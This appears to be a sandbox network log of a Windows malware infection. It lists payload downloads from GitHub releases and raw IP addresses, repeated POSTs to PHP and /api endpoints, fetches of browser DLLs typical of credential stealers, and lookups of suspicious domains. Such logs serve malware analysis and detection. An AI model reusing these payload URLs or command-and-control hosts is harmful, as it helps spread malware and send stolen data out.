    HTTP request: GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
• 142.250.179.238:443 | youtube.com | tls, http2 | firefox.exe | sent 1.4kB, received 7.6kB | 11 pkts out, 10 pkts in
• 216.58.213.14:443 | www.youtube.com | tls, http2 | firefox.exe | sent 1.4kB, received 7.6kB | 11 pkts out, 10 pkts in
• 216.58.201.110:443 | https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 | tls, http2 | firefox.exe | sent 2.9kB, received 75.5kB | 29 pkts out, 67 pkts in
    HTTP request: GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
• 34.149.97.1:443 | firefox-api-proxy.cdn.mozilla.net | tls, http2 | firefox.exe | sent 1.5kB, received 4.3kB | 12 pkts out, 13 pkts in
• 185.7.214.57:481 | powershell.exe | sent 2.1kB, received 911 B | 11 pkts out, 14 pkts in
• 142.250.200.4:443 | https://www.google.com/favicon.ico | tls, http2 | firefox.exe | sent 1.9kB, received 7.5kB | 14 pkts out, 16 pkts in
    HTTP request: GET https://www.google.com/favicon.ico
• 185.7.214.57:481 | powershell.exe | sent 2.1kB, received 911 B | 11 pkts out, 14 pkts in
• 185.7.214.57:481 | powershell.exe | sent 2.1kB, received 911 B | 11 pkts out, 14 pkts in
• 185.7.214.57:481 | powershell.exe | sent 2.1kB, received 911 B | 11 pkts out, 14 pkts in
• 185.215.113.209:80 | http://185.215.113.209/Di0Her478/index.php | http | futors.exe | sent 3.0kB, received 3.8kB | 24 pkts out, 14 pkts in
    HTTP request: POST http://185.215.113.209/Di0Her478/index.php -> response 200 (10 identical exchanges)
• 185.215.113.115:80 | http://185.215.113.115/c4becf79229cb002.php | http | ee1401f004.exe | sent 841 B, received 415 B | 6 pkts out, 5 pkts in
    HTTP request: POST http://185.215.113.115/c4becf79229cb002.php -> response 200
• 127.0.0.1:59582 | firefox.exe
• 185.7.214.57:481 | powershell.exe | sent 2.1kB, received 911 B | 11 pkts out, 14 pkts in
• 127.0.0.1:59590 | firefox.exe
• 185.7.214.57:481 | powershell.exe | sent 2.1kB, received 911 B | 11 pkts out, 14 pkts in
• 185.7.214.57:481 | powershell.exe | sent 2.1kB, received 951 B | 12 pkts out, 15 pkts in
• 127.0.0.1:9229 | ee1401f004.exe
• 185.7.214.57:481 | powershell.exe | sent 2.1kB, received 911 B | 11 pkts out, 14 pkts in
• 20.26.156.215:443 | https://github.com/legendary99999/fdfsdfdssfd/releases/download/dfsdfsdfsdsf/fher.exe | tls, http | futors.exe | sent 2.1kB, received 26.8kB | 26 pkts out, 30 pkts in
    HTTP request: GET https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exe -> response 302
    HTTP request: GET https://github.com/legendary99999/fdsfsdfdsfds/releases/download/dfsfdsfdsdsf/con12312211221.exe -> response 302
    HTTP request: GET https://github.com/legendary99999/saffsfsd/releases/download/dsffdssff/12321321.exe -> response 302
    HTTP request: GET https://github.com/legendary99999/fsdfdsfds/releases/download/sdffdsfsddfs/alex12112.exe -> response 302
    HTTP request: GET https://github.com/legendary99999/fdfsdfdssfd/releases/download/dfsdfsdfsdsf/fher.exe -> response 302
• 163.70.151.63:443 | i.instagram.com | tls | powershell.exe | sent 1.4kB, received 8.9kB | 14 pkts out, 18 pkts in
• 185.7.214.57:481 | powershell.exe | sent 2.1kB, received 911 B | 11 pkts out, 14 pkts in
• 185.199.108.133:443 | https://objects.githubusercontent.com/github-production-release-asset-2e65be/935547594/67a4ea0f-a626-4118-b393-80fb7fdc2175?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003444Z&X-Amz-Expires=300&X-Amz-Signature=6fba39a086068076713cfdf4ac9efbb211495ae5df743c851de203108f97e0f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dfher.exe&response-content-type=application%2Foctet-stream | tls, http | futors.exe | sent 463.9kB, received 22.8MB | 9668 pkts out, 16360 pkts in
    HTTP request: GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/931090743/fe2351f3-d512-4704-a31e-e7267ddf3e14?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003417Z&X-Amz-Expires=300&X-Amz-Signature=66a4490c649969e8e57e49179dcb3d281f5845caaa83cbf7476823ad7406f82a&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dtrano1221.exe&response-content-type=application%2Foctet-stream -> response 200
    HTTP request: GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/932430920/f3727065-e97b-4230-9333-63b156bde389?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003427Z&X-Amz-Expires=300&X-Amz-Signature=d0a095dda97f3ae2552aa4991862c4e6a4469581f8b8e7c7c9530a03e2528eb7&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dcon12312211221.exe&response-content-type=application%2Foctet-stream -> response 200
    HTTP request: GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/933717859/3158e964-6e73-4443-84f8-ddb304d57b87?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003435Z&X-Amz-Expires=300&X-Amz-Signature=f77e2f934b6db0dcdfdf9419e052f8c8ed4bdaf93aca348f73976eb1a93e252c&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D12321321.exe&response-content-type=application%2Foctet-stream -> response 200
    HTTP request: GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/933910050/851ed480-459a-4e09-83d2-9ce8a09d0744?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003440Z&X-Amz-Expires=300&X-Amz-Signature=df4602c7473369f1ea873854603106cdd7f289af4ae5957ac9d4b2cef6079407&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dalex12112.exe&response-content-type=application%2Foctet-stream -> response 200
    HTTP request: GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/935547594/67a4ea0f-a626-4118-b393-80fb7fdc2175?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003444Z&X-Amz-Expires=300&X-Amz-Signature=6fba39a086068076713cfdf4ac9efbb211495ae5df743c851de203108f97e0f3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dfher.exe&response-content-type=application%2Foctet-stream -> response 200
• 185.7.214.57:481 | powershell.exe | sent 2.0kB, received 911 B | 10 pkts out, 14 pkts in
• 127.0.0.1:9222 | 90ced29b15.exe
• 185.7.214.57:481 | powershell.exe | sent 2.0kB, received 911 B | 10 pkts out, 14 pkts in
• 20.42.73.29:443 | https://nw-umwatson.events.data.microsoft.com/Telemetry.Request | tls, http | msedge.exe | sent 37.6kB, received 13.5kB | 49 pkts out, 28 pkts in
    HTTP request: POST https://nw-umwatson.events.data.microsoft.com/Telemetry.Request -> response 200 (6 identical exchanges)
• 185.7.214.57:481 | powershell.exe | sent 2.0kB, received 911 B | 10 pkts out, 14 pkts in
• 185.7.214.51:425 | powershell.exe | sent 260 B, received 200 B | 5 pkts out, 5 pkts in
• 185.7.214.57:481 | powershell.exe | sent 2.3kB
                                                                                              1.2kB
                                                                                              13
                                                                                              15
                                                                                            • 185.215.113.115:80
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              http
                                                                                              ee1401f004.exe
                                                                                              77.7kB
                                                                                              4.3MB
                                                                                              1451
                                                                                              3088

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/68b591d6548ec281/freebl3.dll

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/68b591d6548ec281/mozglue.dll

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/68b591d6548ec281/msvcp140.dll

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/68b591d6548ec281/nss3.dll

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/68b591d6548ec281/softokn3.dll

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.115/68b591d6548ec281/vcruntime140.dll

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST http://185.215.113.115/c4becf79229cb002.php

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 127.0.0.1:9229
                                                                                              ee1401f004.exe
                                                                                            • 127.0.0.1:9229
                                                                                              ee1401f004.exe
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 149.154.167.220:443
                                                                                              api.telegram.org
                                                                                              tls
                                                                                              trano1221.exe
                                                                                              1.4kB
                                                                                              7.5kB
                                                                                              12
                                                                                              12
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.2kB
                                                                                              951 B
                                                                                              12
                                                                                              15
                                                                                            • 195.228.152.90:80
                                                                                              http://elviscomputer.hu/wp-content/uploads/2021/01/engine.php
                                                                                              http
                                                                                              powershell.exe
                                                                                              686 B
                                                                                              8.9kB
                                                                                              5
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST http://elviscomputer.hu/wp-content/uploads/2021/01/engine.php

                                                                                              HTTP Response

                                                                                              403
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 163.70.151.63:443
                                                                                              i.instagram.com
                                                                                              tls
                                                                                              powershell.exe
                                                                                              1.4kB
                                                                                              8.9kB
                                                                                              14
                                                                                              17
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 104.82.234.109:443
                                                                                              https://steamcommunity.com/profiles/76561199822375128
                                                                                              tls, http
                                                                                              c6a31d1295.exe
                                                                                              1.4kB
                                                                                              43.4kB
                                                                                              19
                                                                                              37

                                                                                              HTTP Request

                                                                                              GET https://steamcommunity.com/profiles/76561199822375128

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 149.154.167.99:443
                                                                                              t.me
                                                                                              tls
                                                                                              powershell.exe
                                                                                              1.7kB
                                                                                              18.8kB
                                                                                              17
                                                                                              25
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              con12312211221.exe
                                                                                              3.9kB
                                                                                              12.0kB
                                                                                              18
                                                                                              21

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 127.0.0.1:9222
                                                                                              90ced29b15.exe
                                                                                            • 104.21.63.231:443
                                                                                              https://bloodyeleftor.world/api
                                                                                              tls, http
                                                                                              c6a31d1295.exe
                                                                                              3.8kB
                                                                                              11.7kB
                                                                                              16
                                                                                              20

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 142.250.27.27:25
                                                                                              smtp.google.com
                                                                                              powershell.exe
                                                                                              260 B
                                                                                              5
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              con12312211221.exe
                                                                                              2.3kB
                                                                                              5.1kB
                                                                                              10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.63.231:443
                                                                                              https://bloodyeleftor.world/api
                                                                                              tls, http
                                                                                              c6a31d1295.exe
                                                                                              2.2kB
                                                                                              4.9kB
                                                                                              10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://bloodyeleftor.world/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 104.21.16.1:443
                                                                                              https://stormlegue.com/api
                                                                                              tls, http
                                                                                              con12312211221.exe
                                                                                              1.2kB
                                                                                              5.1kB
                                                                                              9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://stormlegue.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
11 / 14 (packets sent / received; tail of the preceding entry)

Columns: destination | domain or URL | protocol(s) | process | bytes sent / received | packets sent / received. HTTP exchanges observed on a connection are listed indented beneath it; "-" marks a column the listing leaves empty.

• 104.21.63.231:443 | https://bloodyeleftor.world/api | tls, http | c6a31d1295.exe | 1.2kB / 4.8kB | 9 / 9
    POST https://bloodyeleftor.world/api -> 200
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 911 B | 11 / 14
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 911 B | 11 / 14
• 185.215.113.97:80 | http://185.215.113.97/files/FuckMAIN/monthdragon.exe | http | futors.exe | 4.7kB / 364.1kB | 101 / 263
    GET http://185.215.113.97/files/FuckMAIN/monthdragon.exe -> 200
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 911 B | 11 / 14
• 104.21.16.1:443 | https://stormlegue.com/api | tls, http | monthdragon.exe | 3.9kB / 12.0kB | 17 / 21
    POST https://stormlegue.com/api -> 403
    POST https://stormlegue.com/api -> 200
    POST https://stormlegue.com/api -> 200
• 104.21.16.1:443 | https://stormlegue.com/api | tls, http | monthdragon.exe | 2.2kB / 5.2kB | 10 / 10
    POST https://stormlegue.com/api -> 200
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 911 B | 11 / 14
• 104.21.16.1:443 | https://stormlegue.com/api | tls, http | monthdragon.exe | 1.2kB / 5.1kB | 9 / 9
    POST https://stormlegue.com/api -> 200
• 185.7.214.57:481 | - | - | powershell.exe | 2.0kB / 911 B | 10 / 14
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 911 B | 11 / 14
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 911 B | 11 / 14
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 951 B | 12 / 15
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 911 B | 11 / 14
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 911 B | 11 / 14
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 911 B | 11 / 14
• 185.7.214.57:481 | - | - | powershell.exe | 2.0kB / 911 B | 10 / 14
• 127.0.0.1:9222 | - | - | 90ced29b15.exe | - | -
• 149.154.167.99:443 | t.me | tls | powershell.exe | 1.5kB / 7.2kB | 12 / 15
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 911 B | 11 / 14
• 142.250.178.14:443 | https://play.google.com/log?hasfast=true&authuser=0&format=json | tls, http2 | firefox.exe | 2.8kB / 8.6kB | 16 / 19
    POST https://play.google.com/log?hasfast=true&authuser=0&format=json (no response recorded)
• 142.250.187.206:443 | https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip | tls, http2 | firefox.exe | 1.5kB / 8.9kB | 16 / 21
    GET https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip (no response recorded)
• 2.18.121.79:80 | http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip | http | firefox.exe | 9.0kB / 506.3kB | 178 / 366
    GET http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip -> 200
• 104.21.16.1:443 | https://stormlegue.com/api | tls, http | alex12112.exe | 3.9kB / 12.0kB | 18 / 21
    POST https://stormlegue.com/api -> 403
    POST https://stormlegue.com/api -> 200
    POST https://stormlegue.com/api -> 200
• 74.125.105.7:443 | https://r2---sn-aigl6ns6.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1740011681,&mh=R8&mip=212.102.63.147&mm=28&mn=sn-aigl6ns6&ms=nvh&mt=1740011292&mv=m&mvi=2&pl=24&rmhost=r5---sn-aigl6ns6.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r5---sn-aigl6ney.gvt1.com | tls, http | firefox.exe | 315.7kB / 14.9MB | 5575 / 10705
    GET (the URL above) -> 200
• 149.154.167.99:443 | t.me | tls | powershell.exe | 1.5kB / 7.2kB | 13 / 14
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 911 B | 11 / 14
• 185.156.73.73:80 | http://185.156.73.73/service | http | BitLockerToGo.exe | 7.9kB / 106.6kB | 72 / 99
    GET http://185.156.73.73/success?substr=mixfour&s=three&sub=non -> 200
    GET http://185.156.73.73/info -> 200
    GET http://185.156.73.73/update -> 200
    GET http://185.156.73.73/service -> 200 (nine separate requests, all answered 200)
• 104.21.16.1:443 | https://stormlegue.com/api | tls, http | alex12112.exe | 2.3kB / 5.2kB | 11 / 10
    POST https://stormlegue.com/api -> 200
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 911 B | 11 / 14
• 104.21.16.1:443 | https://stormlegue.com/api | tls, http | alex12112.exe | 1.2kB / 5.1kB | 9 / 9
    POST https://stormlegue.com/api -> 200
• 185.7.214.57:481 | - | - | powershell.exe | 2.1kB / 911 B | 11 / 14
• 149.154.167.99:443 | telegram.org | tls | powershell.exe | 1.7kB sent (the remaining columns are cut off at the end of this extract)
                                                                                              13.5kB
                                                                                              16
                                                                                              21
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 172.67.192.178:443
                                                                                              https://blastikcn.com/api
                                                                                              tls, http
                                                                                              fher.exe
                                                                                              3.9kB
                                                                                              11.8kB
                                                                                              18
                                                                                              23

                                                                                              HTTP Request

                                                                                              POST https://blastikcn.com/api

                                                                                              HTTP Response

                                                                                              403

                                                                                              HTTP Request

                                                                                              POST https://blastikcn.com/api

                                                                                              HTTP Response

                                                                                              200

                                                                                              HTTP Request

                                                                                              POST https://blastikcn.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              951 B
                                                                                              12
                                                                                              15
                                                                                            • 172.67.192.178:443
                                                                                              https://blastikcn.com/api
                                                                                              tls, http
                                                                                              fher.exe
                                                                                              2.2kB
                                                                                              4.9kB
                                                                                              10
                                                                                              10

                                                                                              HTTP Request

                                                                                              POST https://blastikcn.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 172.67.192.178:443
                                                                                              https://blastikcn.com/api
                                                                                              tls, http
                                                                                              fher.exe
                                                                                              1.2kB
                                                                                              4.8kB
                                                                                              9
                                                                                              9

                                                                                              HTTP Request

                                                                                              POST https://blastikcn.com/api

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 109.232.216.168:80
                                                                                              byaronia.com
                                                                                              powershell.exe
                                                                                              208 B
                                                                                              4
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 94.100.180.31:25
                                                                                              mxs.mail.ru
                                                                                              powershell.exe
                                                                                              208 B
                                                                                              4
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 127.0.0.1:9222
                                                                                              90ced29b15.exe
                                                                                            • 185.7.214.51:425
                                                                                              powershell.exe
                                                                                              2.9kB
                                                                                              894 B
                                                                                              7
                                                                                              6
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 142.250.200.4:80
                                                                                              http://www.google.com/
                                                                                              http
                                                                                              powershell.exe
                                                                                              1.2kB
                                                                                              2.8kB
                                                                                              9
                                                                                              6

                                                                                              HTTP Request

                                                                                              GET http://www.google.com/

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.215.113.75:80
                                                                                              http://185.215.113.75/files/unique2/random.exe
                                                                                              http
                                                                                              futors.exe
                                                                                              92.3kB
                                                                                              4.1MB
                                                                                              1742
                                                                                              2932

                                                                                              HTTP Request

                                                                                              GET http://185.215.113.75/files/unique2/random.exe

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.5kB
                                                                                              1.1kB
                                                                                              15
                                                                                              13
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              911 B
                                                                                              11
                                                                                              14
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.2kB
                                                                                              951 B
                                                                                              12
                                                                                              15
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              831 B
                                                                                              11
                                                                                              12
                                                                                            • 104.82.234.109:443
                                                                                              https://steamcommunity.com/profiles/76561199724331900
                                                                                              tls, http
                                                                                              BitLockerToGo.exe
                                                                                              1.4kB
                                                                                              36.9kB
                                                                                              18
                                                                                              33

                                                                                              HTTP Request

                                                                                              GET https://steamcommunity.com/profiles/76561199724331900

                                                                                              HTTP Response

                                                                                              200
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              2.1kB
                                                                                              831 B
                                                                                              11
                                                                                              12
                                                                                            • 185.7.214.57:481
                                                                                              powershell.exe
                                                                                              1.7kB
                                                                                              509 B
                                                                                              5
                                                                                              6
                                                                                            • 8.8.8.8:53
                                                                                              g.bing.com
                                                                                              dns
                                                                                              56 B
                                                                                              148 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              g.bing.com

                                                                                              DNS Response

                                                                                              150.171.28.10
                                                                                              150.171.27.10

                                                                                            • 8.8.8.8:53
                                                                                              fruitfuvljourney.tech
                                                                                              dns
                                                                                              8827e2f2e3.exe
                                                                                              67 B
                                                                                              132 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              fruitfuvljourney.tech

                                                                                            • 8.8.8.8:53
                                                                                              nestlecompany.world
                                                                                              dns
                                                                                              d2YQIJa.exe
                                                                                              65 B
                                                                                              133 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              nestlecompany.world

                                                                                            • 8.8.8.8:53
                                                                                              hoyoverse.blog
                                                                                              dns
                                                                                              8827e2f2e3.exe
                                                                                              60 B
                                                                                              172 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              hoyoverse.blog

                                                                                              DNS Response

                                                                                              104.21.96.1
                                                                                              104.21.48.1
                                                                                              104.21.64.1
                                                                                              104.21.16.1
                                                                                              104.21.112.1
                                                                                              104.21.32.1
                                                                                              104.21.80.1

                                                                                            • 8.8.8.8:53
                                                                                              ecozessentials.com
                                                                                              dns
                                                                                              18b64e1917.exe
                                                                                              64 B
                                                                                              137 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              ecozessentials.com

                                                                                            • 8.8.8.8:53
                                                                                              api.ip.sb
                                                                                              dns
                                                                                              0f807048bd.exe
                                                                                              55 B
                                                                                              145 B
                                                                                              1
                                                                                              1

                                                                                              DNS Request

                                                                                              api.ip.sb

  DNS Response: 104.26.12.31, 104.26.13.31, 172.67.75.172

• 8.8.8.8:53  httpbin.org  dns  90ced29b15.exe  160 B sent / 282 B recv  2 pkts sent / 2 pkts recv
  DNS Request: httpbin.org
  DNS Request: httpbin.org
  DNS Response: 52.22.198.150, 3.214.119.249, 3.208.239.150, 34.196.100.57

• 8.8.8.8:53  home.fivenn5sr.top  dns  90ced29b15.exe  174 B sent / 226 B recv  2 pkts sent / 2 pkts recv
  DNS Request: home.fivenn5sr.top
  DNS Request: home.fivenn5sr.top
  DNS Response: 185.72.145.179

• 8.8.8.8:53  friendseforever.help  dns  40e0b6ad21.exe  66 B sent / 131 B recv  1 pkt sent / 1 pkt recv
  DNS Request: friendseforever.help
  (no DNS Response recorded)

• 8.8.8.8:53  shiningrstars.help  dns  alex12112.exe  64 B sent / 129 B recv  1 pkt sent / 1 pkt recv
  DNS Request: shiningrstars.help
  (no DNS Response recorded)

• 8.8.8.8:53  mercharena.biz  dns  alex12112.exe  60 B sent / 122 B recv  1 pkt sent / 1 pkt recv
  DNS Request: mercharena.biz
  (no DNS Response recorded)

• 8.8.8.8:53  generalmills.pro  dns  alex12112.exe  62 B sent / 144 B recv  1 pkt sent / 1 pkt recv
  DNS Request: generalmills.pro
  (no DNS Response recorded)

• 8.8.8.8:53  stormlegue.com  dns  alex12112.exe  60 B sent / 172 B recv  1 pkt sent / 1 pkt recv
  DNS Request: stormlegue.com
  DNS Response: 104.21.16.1, 104.21.96.1, 104.21.64.1, 104.21.112.1, 104.21.48.1, 104.21.32.1, 104.21.80.1

• 8.8.8.8:53  home.fivenn5sr.top  dns  90ced29b15.exe  174 B sent / 226 B recv  2 pkts sent / 2 pkts recv
  DNS Request: home.fivenn5sr.top
  DNS Request: home.fivenn5sr.top
  DNS Response: 185.72.145.179

• 8.8.8.8:53  impactsupport.world  dns  6ccbdd7074.exe  65 B sent / 133 B recv  1 pkt sent / 1 pkt recv
  DNS Request: impactsupport.world
  (no DNS Response recorded)

• 8.8.8.8:53  nestlecompany.world  dns  d2YQIJa.exe  65 B sent / 133 B recv  1 pkt sent / 1 pkt recv
  DNS Request: nestlecompany.world
  (no DNS Response recorded)

• 8.8.8.8:53  pasteflawwed.world  dns  6ccbdd7074.exe  64 B sent / 96 B recv  1 pkt sent / 1 pkt recv
  DNS Request: pasteflawwed.world
  DNS Response: 104.21.86.17, 172.67.214.11

• 8.8.8.8:53  fivenn5sr.top  dns  90ced29b15.exe  164 B sent / 216 B recv  2 pkts sent / 2 pkts recv
  DNS Request: fivenn5sr.top
  DNS Request: fivenn5sr.top
  DNS Response: 185.72.145.179

• 8.8.8.8:53  clients2.google.com  dns  chrome.exe  65 B sent / 105 B recv  1 pkt sent / 1 pkt recv
  DNS Request: clients2.google.com
  DNS Response: 172.217.169.78

